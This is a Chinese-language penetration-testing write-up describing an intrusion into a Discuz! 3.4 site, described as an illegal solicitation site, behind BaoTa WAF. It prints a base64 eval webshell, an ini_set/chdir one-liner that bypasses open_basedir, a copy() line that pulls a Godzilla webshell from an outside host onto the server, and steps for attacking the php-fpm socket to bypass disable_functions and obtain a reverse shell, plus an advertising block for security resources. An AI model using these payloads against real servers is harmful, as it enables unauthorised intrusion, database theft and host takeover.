這次滲透的主站是 一個 Discuz!3.4 的搭建 違法招 piao 網站, 配置有寶塔 WAF
用 Discuz!ML 3.X 的漏洞進行攻擊,但是沒有成功
發現主站外鍊會有一個發夾網,引導人們來這充值,是 某某發夾網,而且域名指向也是主站的 ip,兩個網站在同一個 ,此處忘記截圖了
網上有通殺 payload,寫 shell 的過程在這裡省略了
【一>所有資源擷取<一】1、網絡安全學習路線 2、電子書籍(白帽子)3、安全大廠内部視訊 4、100 份 src 文檔 5、常見安全面試題 6、ctf 大賽經典題目解析 7、全套工具包 8、應急響應筆記
由于網站存在寶塔 WAF ,寫入 shell 必須變形一下,将指令進行 base64 編碼在傳進去
<?php @eval(base64_decode($_POST['yanshu']));?>
在 phpinfo()裡可以看到,寶塔預設會設定 open_basedir 以及 disable_functions,導緻蟻劍的 shell 直接連接配接之後不大好用,指令執行不了
繞過 open_basedir 檢視檔案
利用 ini_set() 來 bypass open_basedir 來擷取路徑名和目錄内容,base64 編碼之後執行,發現寶塔目錄下還有其他站點目錄
eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");
複制代碼
哥斯拉管理 webshell
為了友善檢視檔案 ,使用哥斯拉馬,加密器選擇 PHP_EVAL_XOR_BASE64,用 copy 指令傳到伺服器中,這樣流量就可以不會被寶塔 waf 攔截了
copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');
哥斯拉馬可以自動實作 bypass openbase_dir ,讀取資料庫 使用者名密碼,可以更改管理者使用者進背景或者脫庫
繞過 disable_functions 執行指令
disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函數,環境是 php5.6,導緻很多正常 bypass 的方法都用不了
網站是使用 nginx+php5.6 ,用攻擊 php-fpm 的辦法來 bypass,攻擊原理可以看 參考連結
先找到 php-fpm 的配置 如:/www/server/php/56/etc/php-fpm.conf
或者看 nginx 的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock
首先 選擇 PAttackFPM 将子產品加載并執行
再利用哥斯拉馬中 bypass disable_functions 的子產品 ,成功執行指令
擷取反彈 shell ,可以進一步嘗試對主機進行提權了